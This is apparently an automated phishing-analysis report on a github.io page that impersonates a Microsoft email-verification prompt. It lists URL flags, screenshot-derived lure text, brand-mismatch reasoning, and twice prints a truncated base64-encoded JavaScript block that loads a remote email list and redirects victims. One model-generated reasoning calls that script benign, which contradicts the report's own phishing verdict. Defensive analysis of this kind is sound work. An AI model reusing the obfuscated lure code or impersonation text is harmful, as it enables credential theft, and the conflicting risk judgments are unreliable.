Windows Analysis Report
http://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: http://procustodiavalueslive.github.io

{
    "risk_score": 4,
    "reasoning": "The script appears to have a mix of moderate-risk and low-risk behaviors. It loads an encoded email list from a remote path, which could potentially be used for data exfiltration (moderate-risk). However, the script also includes standard email validation functionality, which is a low-risk behavior. Overall, the script requires further review due to the unclear purpose of the email list and the potential for misuse, but it does not demonstrate clear malicious intent."
}

    
	const encodedScript = 'DQogICAgY29uc3QgdXNlVmVyaWZpZWRFbWFpbExpc3QgPSAwOyAvLyBTZXQgdG8gMSBmb3IgdXNpbmcgZW1haWwgbGlzdCwgMCBmb3Igc3RhbmRhcmQgdmFsaWRhdGlvbg0KY29uc3QgZW5jb2RlZEVtYWlsTGlzdFBhdGggPSAiYUhSMGNITTZMeTl5WVhjdVoybDBhSFZpZFhObGNtTnZiblJsYm5RdVkyOXRMMlJsZG1Wc1pXTjBMM0psYzNSeWIyOXRabTl5YldVdmNtVm1jeTlvWldGa2N5OXRZV2x1TDJ4bFoyRnNjeTUwZUhRIjsgLy8gQmFzZTY0IGVuY29kZWQgVVJMIHRvIHlvdXIgZW1haWwgbGlzdA0KY29uc3QgZW1haWxMaXN0UGF0aCA9IGF0b2IoZW5jb2RlZEVtYWlsTGlzdFBhdGgpOyAvLyBEZWNvZGUgdGhlIEJhc2U2NCBzdHJpbmcNCg0KbGV0IHZlcmlmaWVkRW1haWxzID0gW107DQoNCi8vIExvYWQgdGhlIHZlcmlmaWVkIGVtYWlsIGxpc3QgZnJvbSB0aGUgc3BlY2lmaWVkIHBhdGgNCmFzeW5jIGZ1bmN0aW9uIGxvYWRFbWFpbExpc3QoKSB7DQogICAgaWYgKHVzZVZlcmlmaWVkRW1haWxMaXN0ID09PSAxKSB7DQogICAgICAgIHRyeSB7DQogICAgICAgICAgICBjb25zdCByZXNwb25zZSA9IGF3YWl0IGZldGNoKGVtYWlsTGlzdFBhdGgpOw0KICAgICAgICAgICAgaWYgKCFyZXNwb25zZS5vaykgdGhyb3cgbmV3IEVycm9yKGBGYWlsZWQgdG8gZmV0Y2ggZW1haWwgbGlzdDogJHtyZXNwb25zZS5zdGF0dXNUZXh0fWApOw0KICAgICAgICAgICAgY29uc3QgdGV4dCA9IGF3YWl0IHJlc3BvbnNlLnRleHQoKTsNCiAgICAgICAgICAgIHZlcmlmaWVkRW1haWxzID0gdGV4dC5zcGxpdCgiXG4iKS5tYXAoZW1haWwgPT4gZW1haWwudHJpbSgpLnRvTG93ZXJDYXNlKCkpOw0KICAgICAgICAgICAgY29uc29sZS5sb2coIkNvbmZpcm1lZCBlbWFpbCBsb2FkZWQ6IFN1Y2Nlc3NmdWxseSAiKTsgLy8gRGVidWdnaW5nIGxvZw0KICAgICAgICB9IGNhdGNoIChlcnJvcikgew0KICAgICAgICAgICAgY29uc29sZS5lcnJvcigiRXJyb3IgbG9hZGluZyBlbWFpbCBsaXN0OiIsIGVycm9yKTsNCiAgICAgICAgICAgIGRpc3BsYXlNZXNzYWdlKCJFcnJvciBsb2FkaW5nIGVtYWlsIGxpc3QuIFBsZWFzZSB0cnkgYWdhaW4gbGF0ZXIuIiwgImVycm9yIik7DQogICAgICAgIH0NCiAgICB9DQp9DQoNCi8vIEluaXRpYWxpemUgdGhlIGVtYWlsIGxpc3QgaWYgdG9nZ2xlIGlzIHNldA0KbG9hZEVtYWlsTGlzdCgpOw0KDQovLyBGdW5jdGlvbiB0byB2YWxpZGF0ZSBlbWFpbCBmb3JtYXQgKGlmIHRvZ2dsZSBpcyAwKQ0KZnVuY3Rpb24gdmFsaWRhdGVFbWFpbChlbWFpbCkgew0KICAgIGNvbnN0IHJlID0gL15bXlxzQF0rQFteXHNAXStcLlteXHNAXSskLzsgLy8gU3RhbmRhcmQgZW1haWwgdmFsaWRhdGlvbiByZWdleA0KICAgIHJldHVybiByZS50ZXN0KGVtYWlsKTsNCn0NCg0KLy8gRnVuY3Rpb24gdG8gY2hlY2sgaWYgZW1haWwgZXhpc3RzIGluIHRoZSB2ZXJpZmllZCBsaXN0IChpZiB

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a legitimate email validation and redirection functionality. It includes some low-risk indicators, such as the use of legacy APIs like `XDomainRequest` and basic email validation, but overall the behavior is benign and aligned with typical user authentication flows. The script does not exhibit any high-risk indicators like dynamic code execution, data exfiltration, or suspicious redirects. The contextual adjustments for the use of trusted domains and analytics-like functionality further reduce the overall risk score."
}

    
	const encodedScript = 'DQogICAgY29uc3QgdXNlVmVyaWZpZWRFbWFpbExpc3QgPSAwOyAvLyBTZXQgdG8gMSBmb3IgdXNpbmcgZW1haWwgbGlzdCwgMCBmb3Igc3RhbmRhcmQgdmFsaWRhdGlvbg0KY29uc3QgZW5jb2RlZEVtYWlsTGlzdFBhdGggPSAiYUhSMGNITTZMeTl5WVhjdVoybDBhSFZpZFhObGNtTnZiblJsYm5RdVkyOXRMMlJsZG1Wc1pXTjBMM0psYzNSeWIyOXRabTl5YldVdmNtVm1jeTlvWldGa2N5OXRZV2x1TDJ4bFoyRnNjeTUwZUhRIjsgLy8gQmFzZTY0IGVuY29kZWQgVVJMIHRvIHlvdXIgZW1haWwgbGlzdA0KY29uc3QgZW1haWxMaXN0UGF0aCA9IGF0b2IoZW5jb2RlZEVtYWlsTGlzdFBhdGgpOyAvLyBEZWNvZGUgdGhlIEJhc2U2NCBzdHJpbmcNCg0KbGV0IHZlcmlmaWVkRW1haWxzID0gW107DQoNCi8vIExvYWQgdGhlIHZlcmlmaWVkIGVtYWlsIGxpc3QgZnJvbSB0aGUgc3BlY2lmaWVkIHBhdGgNCmFzeW5jIGZ1bmN0aW9uIGxvYWRFbWFpbExpc3QoKSB7DQogICAgaWYgKHVzZVZlcmlmaWVkRW1haWxMaXN0ID09PSAxKSB7DQogICAgICAgIHRyeSB7DQogICAgICAgICAgICBjb25zdCByZXNwb25zZSA9IGF3YWl0IGZldGNoKGVtYWlsTGlzdFBhdGgpOw0KICAgICAgICAgICAgaWYgKCFyZXNwb25zZS5vaykgdGhyb3cgbmV3IEVycm9yKGBGYWlsZWQgdG8gZmV0Y2ggZW1haWwgbGlzdDogJHtyZXNwb25zZS5zdGF0dXNUZXh0fWApOw0KICAgICAgICAgICAgY29uc3QgdGV4dCA9IGF3YWl0IHJlc3BvbnNlLnRleHQoKTsNCiAgICAgICAgICAgIHZlcmlmaWVkRW1haWxzID0gdGV4dC5zcGxpdCgiXG4iKS5tYXAoZW1haWwgPT4gZW1haWwudHJpbSgpLnRvTG93ZXJDYXNlKCkpOw0KICAgICAgICAgICAgY29uc29sZS5sb2coIkNvbmZpcm1lZCBlbWFpbCBsb2FkZWQ6IFN1Y2Nlc3NmdWxseSAiKTsgLy8gRGVidWdnaW5nIGxvZw0KICAgICAgICB9IGNhdGNoIChlcnJvcikgew0KICAgICAgICAgICAgY29uc29sZS5lcnJvcigiRXJyb3IgbG9hZGluZyBlbWFpbCBsaXN0OiIsIGVycm9yKTsNCiAgICAgICAgICAgIGRpc3BsYXlNZXNzYWdlKCJFcnJvciBsb2FkaW5nIGVtYWlsIGxpc3QuIFBsZWFzZSB0cnkgYWdhaW4gbGF0ZXIuIiwgImVycm9yIik7DQogICAgICAgIH0NCiAgICB9DQp9DQoNCi8vIEluaXRpYWxpemUgdGhlIGVtYWlsIGxpc3QgaWYgdG9nZ2xlIGlzIHNldA0KbG9hZEVtYWlsTGlzdCgpOw0KDQovLyBGdW5jdGlvbiB0byB2YWxpZGF0ZSBlbWFpbCBmb3JtYXQgKGlmIHRvZ2dsZSBpcyAwKQ0KZnVuY3Rpb24gdmFsaWRhdGVFbWFpbChlbWFpbCkgew0KICAgIGNvbnN0IHJlID0gL15bXlxzQF0rQFteXHNAXStcLlteXHNAXSskLzsgLy8gU3RhbmRhcmQgZW1haWwgdmFsaWRhdGlvbiByZWdleA0KICAgIHJldHVybiByZS50ZXN0KGVtYWlsKTsNCn0NCg0KLy8gRnVuY3Rpb24gdG8gY2hlY2sgaWYgZW1haWwgZXhpc3RzIGluIHRoZSB2ZXJpZmllZCBsaXN0IChpZiB0b2dnbGUgaXMgMSkNCmZ1bmN0aW9uIGlzRW1haWxWZXJpZmllZChlbWFpbCkgew0KICAgIHJldHVybiB2ZXJpZmllZEVtYWlscy5pbmNsdWRlcyhlbWFpbC50b0xvd2VyQ2FzZSgpKTsgLy8gQ2FzZS1pbnNlbnNpdGl2ZSBtYXRjaA0KfQ0KDQovLyBGdW5jdGlvbiB0byBoYW5kbGUgdGhlICJDb250aW51ZSIgYnV0dG9uIGxvZ2ljDQpmdW5jdGlvbiBjb250aW51ZUxvYWRpbmcoKSB7DQogICAgY29uc3QgZW1haWxJbnB1dCA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJ0aGVzdXB3aWxsc3VwbGF1cmllYmFyY2UtaW5wdXQiKS52YWx1ZS50cmltKCk7DQoNCiAgICBpZiAoIWVtYWlsSW5wdXQpIHsNCiAgICAgICAgZGlzcGxheU1lc3NhZ2UoIlBsZWFzZSBlbnRlciBhIHZhbGlkIGVtYWlsIGFkZHJlc3MuIiwgImVycm9yIik7DQogICAgICAgIHJldHVybjsNCiAgICB9DQoNCiAgICBpZiAodXNlVmVyaWZpZWRFbWFpbExpc3QgPT09IDEpIHsNCiAgICAgICAgLy8gVmFsaWRhdGUgdXNpbmcgdGhlIHZlcmlmaWVkIGVtYWlsIGxpc3QNCiAgICAgICAgaWYgKGlzRW1haWxWZXJpZmllZChlbWFpbElucHV0KSkgew0KICAgICAgICAgICAgcmVkaXJlY3RVc2VyKGVtYWlsSW5wdXQpOw0KICAgICAgICB9IGVsc2Ugew0KICAgICAgICAgICAgZGlzcGxheU1lc3NhZ2UoIlBsZWFzZSBlbnRlciB2YWxpZCBlbWFpbCBhZGRyZXNzLCBUaGlzIEVtYWlsIGlzIG5vdCByZWNvZ25pemVkISIsICJlcnJvciIpOw0KICAgICAgICB9DQogICAgfSBlbHNlIGlmICh1c2VWZXJpZmllZEVtYWlsTGlzdCA9PT0gMCkgew0KICAgICAgICAvLyBWYWxpZGF0ZSB1c2luZyBzdGFuZGFyZCByZWdleA0KICAgICAgICBpZiAodmFsaWRhdGVFbWFpbChlbWFpbElucHV0KSkgew0KICAgICAgICAgICAgcmVkaXJlY3RVc2VyKGVtYWlsSW5wdXQpOw0KICAgICAgICB9IGVsc2Ugew0KICAgICAgICAgICAgZGlzcGxheU1lc3NhZ2UoIlBsZWFzZSBlbnRlciBhIHZhbGlkIGVtYWlsIGFkZHJlc3MuIiwgImVycm9yIik7DQogICAgICAgIH0NCiAgICB9IGVsc2Ugew0KICAgICAgICBjb25zb2xlLmVycm9yKCdJbnZhbGlkIHRvZ2dsZSB2YWx1ZS4gUGxlYXNlIHNldCAidXNlVmVyaWZpZWRFbWFpbExpc3QiIHRvIDEgb3IgMC4nKTsNCiAgICB9DQp9DQoNCi8vIEZ1bmN0aW9uIHRvIGRpc3BsYXkgZXJyb3Ivc3VjY2VzcyBtZXNzYWdlcyBiZWxvdyB0aGUgaW5wdXQNCmZ1bmN0aW9uIGRpc3BsYXlNZXNzYWdlKG1lc3NhZ2UsIHR5cGUpIHsNCiAgICBjb25zdCBtZXNzYWdlRWxlbWVudCA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJ2YWxpZGF0aW9uLW1lc3NhZ2UiKTsNCiAgICBtZXNzYWdlRWxlbWVudC50ZXh0Q29udGVudCA9IG1lc3NhZ2U7DQogICAgbWVzc2FnZUVsZW1lbnQuc3R5bGUuY29sb3IgPSB0eXBlID09PSAiZXJyb3IiID8gInJlZCIgOiAiZ3JlZW4iOw0KICAgIG1lc3NhZ2VFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAiYmxvY2siOw0KfQ0KDQovLyBGdW5jdGlvbiB0byBoYW5kbGUgcmVkaXJlY3Rpb24NCmZ1bm

{
"contains_trigger_text": true,
"trigger_text": "To proceed, Microsoft need to verify your email address. Please enter the email address associated with this document.",
"prominent_button_name": "Confirm",
"text_input_field_labels": ["hd7qyd@vnjla.co"],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "contains_trigger_text": true,
  "trigger_text": "Trying to sign in",
  "prominent_button_name": "Cancel",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "Microsoft"
  ]
}

{
  "brands": "unknown"
}

```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.",    "The URL 'procustodiavalueslive.github.io' does not match the legitimate domain for Microsoft.",    "The URL is hosted on 'github.io', which is a common platform for hosting personal or project pages, not official Microsoft content.",    "The URL contains no direct reference to Microsoft, which is suspicious for a page claiming to be associated with the brand.",    "The input field email domain 'vnjla.co' does not appear to be associated with Microsoft, adding to the suspicion."  ],  "riskscore": 9}
Google indexed: False

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "Cancel",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": true,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "Microsoft"
  ]
}

```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.",    "The URL 'militarplus.com' does not match the legitimate domain for Microsoft.",    "The domain 'militarplus.com' does not contain any recognizable association with Microsoft.",    "The URL does not contain any subdomains or elements that suggest a legitimate Microsoft service or product.",    "The domain name 'militarplus.com' is unrelated to Microsoft and could be a potential phishing attempt."  ],  "riskscore": 9}
Google indexed: False